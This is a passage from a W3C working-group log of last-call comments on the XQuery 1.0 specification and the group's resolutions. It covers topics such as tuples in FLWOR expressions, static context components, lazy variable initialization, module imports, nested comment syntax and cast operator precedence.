resolve relative URIs and that the resolution is not affected by the xml:base attributes of instance documents accessed by the query or by an xml:base attribute in an element being constructed. The specific answers to the two questions in the comment are, respectively, "yes" and "moo". RESOLUTION: Comment qt-2004Feb1110-01/ORA-XQ-011 is resolved with no changes to the document. Note to F&O editors: In F&O, section 15.5.4, fn:doc(), the Note terminates with the phrase "to this function", which could better be phrased "to the fn:doc function" to avoid confusion. SECTION 3.8: FLWR Expressions Currently, the tuple is defined for the FLWR and order by clauses as containing a set of bound variables. It might help to formalize the tuple notion so that a lot of trivial operations that are possible in languages like SQL (and quite cumbersome to do in XQuery) can be made easy. Example: i) If we map any external related set of values (example an SQL row or an XML file in a file system along with some metadata like author etc..) into XQuery, since there is no notion of a tuple, we have to wrap the XML values in another XML element. This causes issues, since node identities, document boundaries etc.. are lost. ii) When returning values as well, without the notion of tuples, related values either have to be enclosed in an XML element or streamed as siblings in the sequence. This also leads to the same problems as (i). Example - I want to return a Resume XML document and a computed score for the resume. 
Either we have to return a sequence that has the resume document followed by it's score or create a new XML element and stuff the two in there - the latter will lose the resume document's node identity and typing. ii) Performing duplicate elimination is quite a challenge without tuples. (See G.5) iii) Performing grouping operations is also hard. Suggestion: Formalize the tuple as something in between an item and a sequence - A sequence consists of tuples which consists of items. Or maybe introduce a notion of a tuple-sequence as different from a regular sequence. - Steve B. Is this related to sequences of sequences issue discussed at last f2f? A: Yes. RESOLVED: closed ORA-XQ-408-B with no action Dissent: Oracle SECTION C.1: Static Context Components The dynamic context today includes the context item. However, the static context does not include a static type for the context item. This must be included for doing reasonable static type checking. The table in C.1 - Static Context components could include the following item - Component: Context item - Predefined value: none Overwritable by implementation: Overwritable and Augmentable Overwritable by query: -- ?? Scope - Global Consistency rules - Only one context item from the outside environment - Steve B. Minutes log just says "This issue is closed" (joint issue) [[accepted]] SECTION G.5: Selecting distinct combinations Today, the distinct-values takes a single sequence as input and returns a sequence of distinct values. This makes it quite cumbersome to perform distinct values across a tuple. It is trivial in SQL for example to perform a distinct across values - select DISTINCT price, orderno, date from table; With XQuery, one has to get distinct prices, ordernos and dates and then somehow combine them back with the original node. This is both cumbersome and harder to optimize in a general query. Suggestions: i) If we have a sequence of tuples or sequence of sequences, then distinct values can take in a sequence of tuples/sequence of sequences and return a sequence containing distinct values. ii) Or - Add a DISTINCT clause that prunes out nodes that have the same value. Example - the query in G.5 with a distinct clause - for $p in . distinct-values on $p//product, $p//size, $p//color return <option> <product>{$p//product}</product> <size>{$s//size}</size> <color>{$c//color}</color> </option> The clause can remove nodes that have the same value for product, size and color and return some $p that has a distinct set of values. - Steve B. RESOLVED: closed ORA-XQ-407-B with no action Rationale: no new features and this will be subsumed by group-by which we have already agreed to take up in the future Dear XQuery Formal semantic editor: I have some question about XQuery/Xpath core grammar in "XQuery 1.0 and XPath 2.0 Formal Semantics" (2003-11-12). 1)Some Non-Terminal only occur in the left side of core grammar production,but no Non-Terminal can yield it. For example: PrimaryExpr OrderByClause QuantifiedExpr could you explain it in detail? 2)In Formal semantic,OrderByClause can be normalized to nested let and for expressions,but why it still remain in the core grammar? 3) In XQuery standard grammar: ExprSingle ::= FLWORExpr | QuantifiedExpr | TypeswitchExpr | IfExpr | OrExpr In XQuery Core grammar: ExprSingle ::= FLWORExpr | TypeswitchExpr | IfExpr | OrExpr QuantifiedExpr has been removed ,why? best regards liao wei This should probably be moved to Formal Semantics comments. Looks like some bugs. 
This is a follow-on to the thread "recursive imporged [sic] variable declarations": From that I gather that the WG is in favor of dynamic/lazy initialization of variable declarations, allowing code like: M1: define variable $x external; define variable $y { if ($x) then $M2:z else 0 }; M2: define variable $z { $M1:y }; That implies that variable initialization is executed in an order as needed dynamically. The natural implementation model is to lazily initialize each variable on its first reference. E.g. $y translates to (using Java syntax): private int initialized$y = UNINITIALIZED; private Object value$y; public Object get$x() { if (initialized$y == INITIALIZING) throw new Error("cycle initializing $y"); if (initialized$y == UNINITIALIZED) { initialized$y = INITIALIZING; value$y = get$x() ? M2.get$z() : 0; initialized$y = INITIALIZED; } return value$y; } However, 4.8 Variable Declaration in the November XQuery draft says: "Initializing expressions are evaluated at the beginning of the dynamic evaluation phase." This means the initialization has to be done "semi-eagery": all the initializing expressions have to be evaluated before the query expression is evaluated. But which declarations in which modules. There are the options I see: (1) All declarations in all modules that the implementation knows about are initialized before evaluating the query body. This is of course ridiculous. (2) All declarations in the main module are initialized eagerly (before evaluating the query body); other declarations are initialized on first reference. (3) All declarations in the transitive closure of the main module and imported library modules are initialized eagerly in some unspecified order. (4) All declarations are initialized lazily on first reference; no declarations are initialized before evaluating the query body. I think (4) makes most sense, because (a) it is simplest, assuming we're going to require at-need initialization to handle cycles; (b) both (2) and (3) have an arbitrary feel to them; (c) there may be usecases where it may be useful to not initialize a variable if it is not needed. I can't provide examples, but Michael Key says that requiring dynamic resolution of initialization "might not disallow some useful constructs that appear to have a cycle, but are unproblematic if handled dynamically." His statement was in reference to initialzaing ordering, which isn't quite the same as whether a variable must be initialized at all. However, intuitively it seems to me that the latter is tied to the former. -- --Per Bothner per@bothner.com Public response needed: we're proposing to change this text to make it clear that Per's option (4) is permitted. New text proposed by Don: The initializing expression for a given variable must be evaluated before the evaluation of any expression that references the variable. ACTION: A-STATA-19: Liam will respond. (done) Section). RESOLVED by July WD changes. [130] TypeName ::= QName This does not allow wildcards. SECTION 2.2: Processing Model Figure 1 'Processing Model Overview' makes no mention of modules. They are presumably part of the "XQuery" box (as opposed to inputs to the query processing system). Can this be clarified in the picture? - Steve B. editorial. Michael Rys will alter the diagram, following suggestions JM will supply. SECTION 2.1.2: Dynamic context It says that the type of the implicit timezone in the dynamic context is xdt:dayTimeDuration. 
However, appendix C.2 says that this component is merely "overwriteable" as opposed to the current date and time, which are "must be initialized by implementation". F&O section 16.7 "fn:implicit-timezone" says that fn:implicit-timezone() returns type "xdt:dayTimeDuration?", which appears to be the correct type of the implicit timezone (ie, with a "?" quantifier). - Steve B. ++ RESOLUTION: The language document now states, in Appendix C, that implicit timezone must be initialized by the implementation. This comment is closed (overtaken by events). ++ Steve Buxton is asked to send a message to the joint list pointing out that in F&O, fn:current-dateTime() cannot return an empty sequence but fn:implicit-timezone() can return an empty sequence. The return types of these functions are inconsistent. XQuery says that the implementation MUST initialize these context items, but XPath does not state this requirement. Should XPath require the current dateTime and implicit timezone to be initialized? SECTION A.2.2: lexical rules The action pushState is used inconsistently in the transitions, sometimes with an argument and sometimes without. The only guidance to the reader is the sentence "In some cases, a transition will 'push' the current state or a specific state onto an abstract stack...". The reader is left to surmise that pushState() means "push the current state" whereas pushState with an argument means "push the argument state". But if we look at the table for OPERATOR state, first row, we see the pair of actions: DEFAULT pushState(DEFAULT) This seems to mean: first, change the current state to DEFAULT, and then push the state DEFAULT on the stack. In that case, couldn't you just write the second action as pushState()? If we look at the next to the last line in the same table, we see EXT_KEY pushState() which seemingly means, change the current state to EXT_KEY, and then push that state. This leaves this reader confused, why in one case you chose to push the state explicitly, and in the other case you did not? I toyed with the possibility that the latter example is to be interpreted "change the current state to EXT_KEY, but push the former state on the stack." But if that is your intention, wouldn't it be better to write it pushState() EXT_KEY ? (Actually, there is considerable evidence in other rules that this is indeed your meaning; I am filing a separate comment asking you to please list the actions in the order of execution instead of this confusing reverse order of execution.) The best solution in my opinion is simply to get rid of the argumentless pushState -- always write out explicitly what state you want to push. That also eliminates the issue of order of execution. - Steve B. Proposal accepted. According to table C2, the context item, context position, and context size are all overwriteable by the implementation. The context position "Must be consistent with context item and context size", and the context size "Must be consistent with context item". I think we should clearly say that if there is no context item, the context position and context size are undefined. It is not reasonable to have no context item but set the context position to 42 and the context size to 43. I think we should clearly say that if there is a context item, the context position and context size are 1. It is not meaningful to say that the single context item is in position 42 of some sequence to which the query has no access. 
(Obviously, the context item might have a position in a child sequence to which the query has access). Jonathan Andrew: from an XSLT point of view, if I'm iterating through nodes, XSLT will make some item the current item, do I have access to the position and size? Jonathan: I think that's a different issue; the table C2 is different between XSLT and XQuery, but XSL felt this was XQuery-only Jerome: if you're binding from an API you might get your context item coming from a collection from a previous query, e.g. fom XQJ Jonathan's comment: "I think we should clearly say that if there is no context item, the context position and context size are undefined." RESOLVED: agreed to state this in the document. The comment continues: "I think we should clearly say that if there is a context item, the context position and context size are 1" Jerome was unhappy with this, in case the implementation wants to make them something other than position and size 1. Example, your Java program calls an XQuery implementation and gets some results, and then wants to do more processing on each of those results. Insights: Jonathan was thinking that the root level context item constrained the entire query, so you could never go above it, but in Jerome's scenario one indeed might do so. Andrew: if the context item is provided then a position and size must be provided where position > 0 and <= size and the size must be greater than zero. Paul: this replaces the text The context position "Must be consistent with context item and context size", and the context size "Must be consistent with context item". Andrew's definition replaces these, along with the above resolution for if there is no initial context item. RESOLVED: adopted, Don to make these clarifications Jonathan: this should be clarified further to mention it's about the initial context item, size and position. Only the initial values are overwriteable, so C2 should indicate this. RESOLVED: agreed. RESOLVED: qt-2004Feb0166-01 closed Query Lang [4.12] local: "The declared function name in a function declaration must be a QName with a non-empty namespace prefix. If the namespace prefix of a declared function name is empty, a static error is raised.[err:XQ0045]" and "It is a static error if the declared name in a function declaration uses one of the predefined namespace prefixes other than local.[err:XQ0045]" What is the rationale for this restriction on the function _prefix_? Is there a defined mapping from the prefix "local" in the QName "local:myFcn" to a URI? If so, what is it? If there is no such mapping, this seems at odds with recommendations of the web architecture [1]. A constraint on the specific prefix seems very unsound architecturally. Why not permit functions in the main module to have no namespace? Why not permit functions in the main module to use the default function namespace (and its associated prefix)? Suggest: * Strike the second constraint entirely, and remove the special-casing for the prefix 'local'. * Either: Strike the first constraint entirely. or Recast in terms of namespaces (rather than namespace prefixes) and permit function declarations to assume the default function namespace. [1] Mary: the text no longer talks in terms of prefixes, so I'm happy to consider 836-01 closed. Query Lang [4.12] Function Declaration prefix vs. namespace. "The declared function name in a function declaration must be a QName with a non-empty namespace prefix. 
If the namespace prefix of a declared function name is empty, a static error is raised.[err:XQ0045]" This restriction as stated should be that the _namespace_ be non-empty. If a default function namespace is in effect in the module, it seems that the logical thing to do would be to apply it equally to function definitions. subsumed by qt-2004Jan0083-01 (already closed) Don: Q7a (qt-2004Feb0834-01) has been fixed So: qt-2004Feb0834-01 accepted and processed: so RESOLVED and CLOSED by editorial tweak made by Don Query Lang [4.8] Schema Import It does not appear to be possible to import a schema with no target namespace. The syntax rules require a namespace to be present. Suggest either (1) making the second StringLiteral in the production for SchemaImport optional or (2) adding alternatives that use an explicit "nonamespace" token, e.g. (1) import schema at "nonamespace.xsd"; or, with no location hint: import schema; (2) import schema nonamespace at "nonamespace.xsd"; or, with no location hint: import schema nonamespace; Alternative (2) is more in line with XML Schema's explicit marking on non-namespaced schemas; alternative (1) is simpler. RESOLUTION: This issue is closed without change to documents. It has been overtaken by events. Query Lang [4.9] Module Import "It is a static error if the target namespace of the module to be imported is the same as the target namespace of the importing module. [err:XQ0056]" Request that this sentence be struck. It introduces no useful constraint that is not already covered by existing rules, but introduces a constraint that is highly detrimental to application development. The analogy to imagine here is that a module namespace is a Java package name, and the individual module instances are individual Java classes. This rule is equivalent to saying that each Java class can only import classes in other packages. It can import multiple classes from other packages, but not any from its own package. Consider a complex XQuery application, where the code is partitioned across multiple developers. There are a number of cases where module namespaces do not provide the level of granularity for managing complex code bodies. In these cases, providing the means to partition the namespace across multiple sources, and use the module locations in the intuitive fashion (i.e. a file location locates a file which is syntactically a complete module) provides great benefit. To get the full benefit of this ability to partition an application namespace across multiple sources, the decision to forbid importation of modules from the same namespace should have been reconsidered in the context of the decision to allow imports of the same module namespace from multiple locations. Case 1: Two independent developers, working on different functions. Developer A: selection-lib.xqy module "" Developer B: display-lib.xqy module "" Syntactically each of selection-lib.xqy and display-lib.xqy is a module, and scopes its contents as normal. Application: application.xqy declare default function namespace "" import module "" at "selection-lib.xqy" import module "" at "display-lib.xqy" The application will see the function declarations and variable names declared in either selection-lib.xqy or display-lib.xqy. Any name conflicts will be handled in the usual fashion, raising a static error [err:XQ0037]. We allow this, provided that application.xqy is not itself a module. Case 1b: As above, but there are some shared constants that A and B both require. 
Developer A: selection-lib.xqy module "" import module "" at "constants.xqy" Developer B: display-lib.xqy module "" import module "" at "constants.xqy" Application: application.xqy as before This is forbidden by the offending sentence. Both selection-lib.xqy and display-lib.xqy will therefore need to repeat the shared declarations, but this will create a name conflict in application.xqy and raise an error. Case 2: Use module to scope function definitions, without introducing need for separate namespace. Support library (protected): application-lib.xqy module "" API: application-api.xqy module "" import module "" at "application-lib.xqy" Application: import module "" at "application-api.xqy" The application only sees the interface defined in application-api.xqy, and not (using normal module scoping rules) the non-API functions in application-lib.xqy. Again, this is ruled out by the offending sentence. JR: Mary H is saying, why can't you import a module with the same NS as the current module. Example from the issue description: module "" import module "" at "constants.xqy" straw poll delete sentence: 1 no change: 4 abstain 5 The chair declared the status quo prevailed Closed, rejected, but logical/physical text adopted, with the following two changes: impl'n dependent -> impl'n defined logical module, physical module: module = logical module module resource for physical module The confusion between schema components and module components was a source of concern expressed by Liam, later also by MichaelR and others. This means that the scope table will change from "global" to The string literals that follow the at keyword are optional location hints, and can be interpreted or disregarded in an implementation-DEFINED way. Each physical resource corresponds to a module resource. A logical module is defined by its namespace URI, and may be defined by a combination of more than one physical module, which must each be a syntactically valid instance of the module production. [err:XQ0060] The editor (Don) will need to check the documents for the term module and change to module resource everywhere. Query Lang [2.5.2] Cannot catch errors Dynamic errors can be raised, for example through fn:error(), but there is no means to catch them. This is a serious deficiency for writing robust applications, as one must take immense pains to ensure that no expression can ever, given any set of data, raise a dynamic error if one wants to produce an application level error result instead of an implementation level one. Suggest: add try $expression catch $variable $expression where the variable binds to the error and is an item This expression will return the value of the try clause unless a dynamic error was raised, in which case it will return the value of the catch clause. Example: A function with a parameter that you want to validate using "validate". If it's not valid, the query blows up and cannot recover, for example, by fixing up the bad data. The query should be able to do some internal recovery. Example: A query performs a division somewhere resulting in an xs:decimal, and it happens to result in an overflow, from which the application could benignly recover. The application should be given that chance. MK: Notes that XSL WG is looking at concrete proposal at the moment, something very similar to this, simple proposal. Expect resolution to consider at F2F. Proposal is to put it in XPath and we technically prefer it there, but we could put it in XSLT, or XQuery could decide not to include that part of XPath. 
MR: Have just negated a couple of features under no new features. JR: What new information? A: A whole lot of field experience. Information that XSL WG is considering it. JR: If we do do this, would like to go back to the larger proposal from a year ago. Want to be done. Don't drastically change scope of project this late in the game. JS: This is a very important feature. Would want to spend time considering it carefully. RESOLVED: Closed with no action Support: 5 Abstain: 5 Dissent: Mark Logic, Michael Kay (a procedural objection) [General] Input sources There should be a standard mechanism to obtain a vendor-specified "input sequence". For document-oriented repositories this would be something like a list of all documents in the database so input()//foo[bar="x"] would apply the XPath to every document in the database. It could be a specially named variable instead, but since doc() and collection() are functions, it'd be more consistent to use input(). Using a standard mechanism helps query portability. we CLOSED this at yesterday's distributed meeting, by adopting a zero-argument collection function See related comment CER-01 Query Lang [3.1.6, Appendix A] Line-oriented comment syntax Assume the expression: "This is fun :)". How do you comment it out? It is an area loaded with problems, and nesting of comments should be removed . If the goal of nesting comments is to allow the commenting out of large code blocks, it is possible to add back in the # line-oriented commenting mechanism. Modern text editors make it easy to #-mark many lines in a row. Rejected: Although I like line-oriented comments, XQuery and XPath are nowhere else line ending sensitive. I suggest we close this with no action. What's a line? MH: This is really about having two comment syntaxes. Proposal: close without change. Query Lang [2.6.6, 3.1.6, Appendix A] Comments and pragmas The overlap in syntax of pragmas and comments, as well as the nesting of comments creates difficulties and questions about corner cases that are not clear from the text: (1) (: is this a comment? ::) (2) (: can I comment out a (:: pragma ::) like this? :) (3) (: is this a comment? ::) or an error? :) (4) (: what about a partial (:: pragma? :) (5) (:: pragma with a comment (: is this ok? :) or not ::) (6) (:: pragma with a comment (: is this a comment? ::) or an error? :) ::) (7) (:: pragma with a comment (: what about a partial (:: pragma? :) ::) (8) (: commenting out a (: comment :) is confusing :) (9) let $string := "this is just a string :)" (10) (: let $string := "this is just a string :)" :) (11) let $another := "this is another string (:" (12) (: let $another := "this is another string (:" :) Suggest (a) making clear that comments are not allowed inside pragmas and (b) removing nesting of comments. Technically answered as resolution from some other LCCs. But I suggest we use many of Mary's examples directly in the text as illustrations as to the behavior. On the other hand, the group can always reconsider the decision.(1) (: is this a comment? ::) Answer: yes. (2) (: can I comment out a (:: pragma ::) like this? :) Answer: yes. The inner pragma is seen a a comment in this case. (3) (: is this a comment? ::) or an error? :) Answer: error. ANY unbalanced nesting of "(:"/":)" will result in an error. (4) (: what about a partial (:: pragma? :) Answer: ANY unbalanced nesting of "(:"/":)" will result in an error. (5) (:: pragma with a comment (: is this ok? :) or not ::) Answer: it's fine, but inner content is not a comment. 
(6) (:: pragma with a comment (: is this a comment? ::) or an error? :) ::) Answer: error, "::)" patterns are not allowed in pragma's and extensions. (7) (:: pragma with a comment (: what about a partial (:: pragma? :) ::) Answer: this is fine. (8) (: commenting out a (: comment :) is confusing :) Answer: OK. Trying to comment out a large block with a bunch of other comments in them is even more confusing. (9) let $string := "this is just a string :)" Answer: No error. (10) (: let $string := "this is just a string :)" :) Answer: Error. Yes, this is a limitation of nested comments. (11) let $another := "this is another string (:" Answer: No error. (12) (: let $another := "this is another string (:" :) Answer: Error. Yes, this is a limitation of nested comments. NW: You could use numeric character references. Maybe. Proposal: close without change except that these examples should be in the document. ACTION A-172-02: Scott to make sure these examples occur in the document. Accepted. Appendix A.1 EBNF Technical It looks like that we cannot parse an expression of the form: "1" cast as xs:integer = "1.0" cast as xs:integer. Which is semantically the same as xs:integer("1") = xs:integer("1.0"). Based on the precedence table, I would assume that cast as binds stronger than =, and from a composability point of view, I would also expect to be able to write the above. However, when following the grammar, it looks like the grammar pops out without consuming the =. Here is the parse process: "1" is consumed by Expr->SingleExpr->OrExpr->AndExpr->InstanceOfExpr->TreatExpr->CastableEx pr->CastExpr->ComparisonExpr->RangeExpr->AdditiveExpr->MiltiplicativeExp r->UnaryExpr->UnionExpr->IntersectExpr->ValueExpr->PathExpr->RelativePat hExpr->StepExpr->FilterStep->PrimaryExpr->Literal->StringLiteral Which then pops back to CastExpr that consumes "cast as xs:integer" Then we pop back to the top and realize that we have left overs and raise a parse error. This is also a problem for the related treat as, castable as etc. Hi Michael. Paul wanted me to give high priority to answering this particular issue (original mail at [1]). Since the November document, the WG has agreed to change the precedence of instance-of, treat, castable, and case (in response to a previous issue raised [2] by you). The precedence table is now looking more like: 1 (comma) 2 FLWORExpr, some, every, TypeswitchExpr, IfExpr 3 or 4 and 5 eq, ne, lt, le, gt, ge, =, !=, <, <=, >, >=, is, <<, >> 6 to 7 +, - 8 *, div, idiv, mod 9 unary -, unary + 10 union, | 11 intersect, except 12 instance of 13 treat 14 castable 15 cast 16 ValidateExpr, /, // 17 [ ], ( ) so that these operators bind much more tightly. In the most recent test parser, your expression parses fine: Type Expression: "1" cast as xs:integer = "1.0" cast as xs:integer |QueryList | Module | MainModule | Prolog | QueryBody | Expr | ComparisonExpr = | CastExpr | PathExpr | StringLiteral "1" | CastAs cast as | SingleType | AtomicType | QNameForAtomicType xs:integer | CastExpr | PathExpr | StringLiteral "1.0" | CastAs cast as | SingleType | AtomicType | QNameForAtomicType xs:integer Please let me know if this previously decided issue resolves MS-XQ-LC1-146 in your view. Thanks! -scott [1] [XQuery] MS-XQ-LC1-146 [2] Grammar issue: cast as Yes. This seems to resolve the issue. Thanks Mi See [436] Section 4.12 Function Declaration Technical Please remove the local namespace prefix and URI for functions. 
It is only a small burden for the user to define his own prefix and it reduces the implementation complexity by not having to special case this local prefix and namespace. (please remove the local namespace prefix and URI for functions) Everyone can live with the status quo. Section 4.12 Function Declaration Technical "An XQuery implementation may augment the type system of [XQuery 1.0 and XPath 2.0 Data Model] with additional types that are designed to facilitate exchange of data with host programming languages": Please make sure that this type is available in the context of the general type system. In particular, make sure that it is placed under either one of xs:anyType, xs:anySimpleType or xdt:untypedAtomic and not under concrete types. Issue closed with xdt:AnyAtomicType as the type to be used. (joint issue) Issue closed with xdt:AnyAtomicType as the type to be used. (joint issue) Section 4.11 Default Collation Declaration Technical "If a Prolog specifies more than one default collation,": How can you specify more than one. We should syntactically only allow one. Issue closed - No changes to the documents at this time. (xquery-only) Issue closed - No changes to the documents at this time. (xquery-only) Section 4.11 Default Collation Declaration Technical "The default collation applies to all functions that require a collation, except the following functions: fn:contains, fn:starts-with, fn:ends-with, fn:substring-before, and fn:substring-after. If one of these functions is called without an explicit collation parameter, it uses the Unicode codepoint collation rather than the default collation.": Why are these functions treated differently. We think that this is more confusing than helpful and request to not special-case them and have them take the default collation as well. because of resolution in Section 4.8 Variable Declaration Technical "If the value provided by the external environment is not compatible with the declared type of the variable, a type error is raised.[err:XP0006]": A static typing implementation cannot do this check at runtime. Therefore, an implementation will need to guarantee that this is an axiomatic constraint. Therefore, we request that this is formulated as a constraint. Jonathan is not aware of such a constraint already existing. So we'd be asking the editors to add one. Don: Constraints don't have errors, so I'll have to take this error away. MR: agreed. Accepted. Don will add the constraint. Section 4.8 Variable Declaration Technical "If an initializing expression cannot be evaluated because of a circularity (for example, it depends on a function that in turn depends on the value of the variable that is being initialized), a dynamic error is raised": This error should be determined and raised statically. gives examples (under 5.E). Agreed that this should be a static error, if it's an error. Sections 4.8/3.8.1 Technical "the static type of the expression must be compatible with the declared static type; otherwise a type error is raised.[err:XP0004]": As in function parameter passing, we should allow the general type promotion and atomization rules to take place for variable assignments. straw poll: for: 2 against: 2 abstain: 6 rejected, not enough support Section 4.7 Module Import Technical We believe that the module import feature is problematic in that is seems not well-enough understood to make it a normative part of the spec even as an optional feature. 
Can we introduce a category of exploratory features that may change in the next version and does not guarantee backward-compatibility on the recommendation level? straw poll: do we leave modules in our WDs? leave in: 7 remove: 3 Chair rules that the status quo prevails, and modules remain. Section 4.4 Namespace Declaration Technical "However, a declaration of a namespace in the Prolog can override a prefix that has been predeclared in the static context." Please move the exception with the prefix xml up here. ACTION A-216-10 Jonathan to respond to qt-2004Feb0784-01 Section 4.4 Namespace Declaration Technical "unless it is overridden by a namespace declaration attribute in an element constructor.": See our comment MS-XQ-LC1-084. RESOLVED: qt-2004Feb0783-01 is rejected, consistent with our decision on qt-2004Feb0492-01. (IBM-XQ-024) Section 3.7.3.5, Computed PI Constructors: The name expression of a Computed PI constructor should undergo atomization, and should accept values of type xdt:untypedAtomic, in order to be consistent with the name expression of a Computed Attribute Constructor. --Don Chamberlin (IBM-XQ-025) Section 3.9.3, Order By and Return Clauses: The first bulleted list says that each orderspec in an Order By clause must "return values of the same type for all tuples." We should use a different term: "comparable types" rather than "same type", and we should define the term. For the purposes of this rule, all numeric types should be "comparable". The types xs:string and xdt:untypedAtomic should be "comparable". Any atomic type should be "comparable" with its derived types, and two atomic types that are derived from the same base type (or that are both derived from numeric types) should be "comparable". --Don Chamberlin DECISION: qt-2004Feb0775-01 has been accepted by a previous decision and already implemented in the July 2004 draft. (IBM-XQ-023) Section 3.7.3.2, Computed Attribute Constructors: The last paragraph of this section, which says that a computed attribute constructor must not be a namespace declaration attribute, should be deleted. This case is covered by Name Expression Rule 3. However, this rule should be extended to raise an error if the resulting QName has no namespace URI and its local name is xmlns. --Don Chamberlin (IBM-XQ-021) Section 3.7.4, Namespace Nodes on Constructed Elements: In the Note in this section, the second paragraph says that an implementation can choose to assign the default namespace (by generating a namespace declaration with a null prefix) when constructing an element. This is a dangerous thing to do. The string content of the element may contain some names that are intended to be in no namespace. Unexpectedly reassigning the default namespace would cause these names in element content to be interpreted incorrectly. I suggest deleting this paragraph. --Don Chamberlin WG Resolution: delete the 2nd paragraph feb 774 WG Resolution: delete the 2nd paragraph feb 774 (IBM-XQ-022) The following parts of the XQuery document depend on the ability to cast any atomic value into a string: (a) Section 3.7.1.1, Direct Element Constructors--Attributes, Rule 3b. (b) Section 3.7.1.3, Direct Element Constructors--Content, Rule 1d. (c) Section 3.7.3.1, Computed Element Constructors, Content Expression Rule 1. At present, the Functions and Operators document does not permit a QName to be cast into a string. It is clearly not acceptable to be unable to construct any element or attribute that contains a QName. 
This inconsistency between the XQuery and Functions and Operators documents needs to be corrected. Note that casting a QName into a string is also required by the Serialization document, as noted in comment IBM-SE-015. --Don Chamberlin RESOLVED: CLOSED by adoption of the triple proposal (IBM-XQ-020) Section 3.7.3.5, Computed Processing Instruction Constructors: If the content expression of such a constructor (after atomization) contains the string "?>", a dynamic error should be raised (a processing instruction cannot contain its own delimiter). --Don Chamberlin (IBM-XQ-019) Section 3.7.1.5, Type of a Constructed Element: This section says that a direct element constructor adds the name of the constructed element to the validation context for nested expressions. Does this rule still apply if the direct element constructor has an xsi:type attribute? How can validation context (a static property) be affected by the value of an xsi:type attribute (which can be dynamic)? Similarly, in Section 3.7.3.1, Computed Element Constructors: If the name of the constructed element is computed by an expression (which, after all, is the reason for having a computed element constructor), the validation context for nested expressions is set to "global". This seems likely to cause problems. Suppose that I use a computed element constructor to construct an element named Address, with a nested element named Zipcode. If Address is a computed name, the validation context for the Zipcode element will be "global". But it's likely that the Zipcode element is not defined globally, but only within an Address. Because of examples like this, I am increasingly skeptical of the concept of "validation context". I do not believe that it is well understood. I think we would be well advised to stop trying to validate things that do not have top-level schema definitions, at least in XQuery Version 1. Deferring this complex and poorly understood feature until after XQuery Version 1 would provide us with practical experience that might lead to a more robust design if this feature is found to be needed in a later version. It would also allow us to focus our efforts on more important issues such as defining an update language. My specific proposal is as follows: (a) Eliminate "validation context" from the Static Context. (b) Eliminate ValidationContext (formerly called SchemaContext) from the grammar. (c) Replace Section 3.7.1.5, Type of a Constructed Element, with a new section based closely on as suggested by Michael Kay. This will bring XQuery into alignment with XSLT 2.0. It will also resolve all the questions raised in this comment, including how to deal with xsi:type attributes. The text suggested by Mike is Section 19.2.1 of the XSLT 2.0 document, entitled "Validating Constructed Elements and Attributes". It can be inserted into the XQuery document with minor editing, such as replacing "validation attribute" with "validation mode", replacing "synthetic schema document" with "in-scope schema definitions", and deleting XSLT-specific references such as "xsl:copy-of". (d) Replace Section 3.14, Validate Expressions, with a new section based closely on Sections 19.2.1 and 19.2.2 of the XSLT 2.0 document, which define validation for element and document nodes, respectively. The result of this proposal will be to simplify XQuery, bring it into alignment with XSLT 2.0, resolve the questions raised in this comment, and dispose of Action Item XQUERY-162-03. 
A related action, which I do not believe to be required by this proposal but which would certainly be consistent with it, would be to eliminate SchemaContextPath from the SequenceType syntax, cleaning up another complex and poorly understood part of the language. --Don Chamberlin ACCEPTED and CLOSED, as we abolished validation context; did this in query teleconf 190, June 3rd. [Liam note: missed because of a typo in the issue number]

(IBM-XQ-018) Section 3.7.1.3, Direct Element Constructors--Content: This section says that element nodes that are copied by an element constructor retain their namespace nodes. This seems to imply that the copied nodes do not also inherit namespace nodes from their new parent. Is this correct? If so, the copied node may have fewer namespace nodes than its parent. How can such a node be serialized? Does this introduce a dependency on "undeclaration" of namespaces, supported only by Namespaces 1.1? Similarly, in Section 3.7.4, Namespace Nodes on Constructed Elements: Suppose that the namespace prefix "a" is defined in the Static Context. Suppose that a constructed parent element has an attribute named "a:b" but its constructed child element does not use the prefix "a" in any name. According to the rules in this section, the parent element will get a namespace node for "a" but the child will not. Again, how can these elements be serialized? Is this another dependency on Namespaces 1.1? --Don Chamberlin RESOLVED and CLOSED: This has been resolved by inventing yet another prolog declaration that tells constructors whether to copy or not; resolved and decided on XQuery telcon 197 on Jul 28 (cf. also w3c-xsl-query/2004Jul/0028, which was the base from which we made this decision). Don was there (telcon 197, July 28) and was given action item A197-01, and it was finally approved at query meeting 199.

(IBM-XQ-017) Section 3.1.5, Function Calls: Error XP0018, referenced in this section, is just a special case of Error XP0002, which is used in several other places for the same condition. Since Error XP0002 is more general-purpose, we should eliminate XP0018 and change all its references to XP0002. (If retained, XP0018 should be made dynamic rather than static.) --Don Chamberlin RESOLVED and CLOSED (by miraculous agreement between Don and MRys): delete the last sentence of section 3.1.5 (number 4 in the 23 Jul 2004 version). [XQuery] IBM-XQ-017: Delete error XP0018 The above reference seems spurious. This comment was accepted and the change has already been implemented.

(IBM-XQ-016) Section 2.1.1, Static Context: Static type analysis of an expression that contains a "dot" (such as ". + 1" or "substr(., 1)") depends on the static type of the context item. But there is no component in the static context for the static type of the context item. Should we add such a component and allow implementations to initialize it (since they are allowed to initialize the context item)? --Don Chamberlin Minutes log just says "This issue is closed" (joint issue) [[accepted]]

SECTION 4.12: Function Declaration The section talks about being able to write a function in a host programming language and then declare the function in XQuery as external. However, it is not clear whether the function declaration is required for all external functions or whether it is optional. According to appendix C.1, the in-scope functions are augmentable by an implementation, which suggests that an implementation may choose not to require a function declaration for each external function.
If this is the case, it would be helpful to clearly mention in this section that the function declaration may be optional for external functions. - Steve B. DC (and others) believe it is already clear that the implementation can add functions to the static context on initialization; therefore, by definition, it is not required to declare all extension functions. (Indeed, if the vendor has automatically added a function to the context, it is an error to add the same function explicitly.) RESOLVED: to close the issue with no action, on the grounds that the spec already says what the comment is asking for.

SECTION 2.1.1: Static context The static context has no type information for the context item; consequently it is impossible to do static analysis of expressions that use the context item. - Steve B. Item closed pending further discussion on the default type (item?) as proposed by Andrew. Michael Rys to start an e-mail on the default type proposal. Discussion on whether item()? makes sense. Can the expression "." ever return the empty sequence? MKay believes not. MRys thinks a static type of "none" would be more appropriate, since this will lead to a static error for the query ".". Jerome suggests another formulation: by default "it's not in the context". Andrew thinks this is equivalent to "none". RESOLUTION to qt-2004Feb0700-01: Accepted the proposal, with "item()?" changed to "none". Issue ORA-XQ-374-B is closed. (Note this is an XQuery comment.) There is no change to the document, since Don anticipated the WG decision. Don pointed out that in other entries in the table, "none" means there is no default. Here it means that the default is "none". Don will sort this out editorially.

